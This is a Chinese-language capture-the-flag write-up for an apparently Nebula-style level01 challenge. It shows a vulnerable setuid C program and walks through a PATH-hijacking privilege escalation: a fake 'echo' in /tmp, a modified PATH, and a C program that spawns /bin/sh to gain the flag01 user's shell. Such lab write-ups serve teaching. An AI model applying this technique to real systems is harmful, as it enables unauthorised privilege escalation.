本文详细介绍了如何通过环境变量和系统调用实现从一个用户到另一个用户的权限转移,以获取特定用户(如flag01)的权限,并通过编译和执行特定的C语言程序来实现这一过程。
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level01 account with the password level01 . Files for this level can be found in /home/flag01.
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/usr/bin/env echo and now what?");
}
首先得明白env这个命令是干什么的,env用来执行当前环境变量下的命令或者显示当前的环境变量。
echo是打印命令。
如果直接运行这个程序肯定会在终端上打印出来 and now what?
要想获得flag01的权限关键是利用system这个执行命令的系统调用。我们这个程序的可执行权限已经是flag01了,也就是它的euid用户是已经是flag01了。
因为echo已经是系统的内置命令了,所以我们无法改变echo的行为,开始时先export echo=getflag,或者别的一些都是不成功的,依然无法改变echo的行为。
因为每个用户在/tmp下面都是具有rwx权限的,所以我们可以在/tmp下面新建一个echo,然后export PATH=/tmp:$PATH, 这样的话执行起来会先去/tmp目录下查找echo这个可执行程序,如果存在则运行。
好的,下面在/tmp目录下新建一个文件test.c:
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
setuid(0);
setgid(0);
execl("/bin/sh","sh",(char *)0)
return 0;
}好的,来到我们flag01的目录下运行./flag01, 发现返回了一个shell,输入命令whoami, 发现用户名变成了flag01,运行getflag发现oh,my God!
成功。
扫一扫
639
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
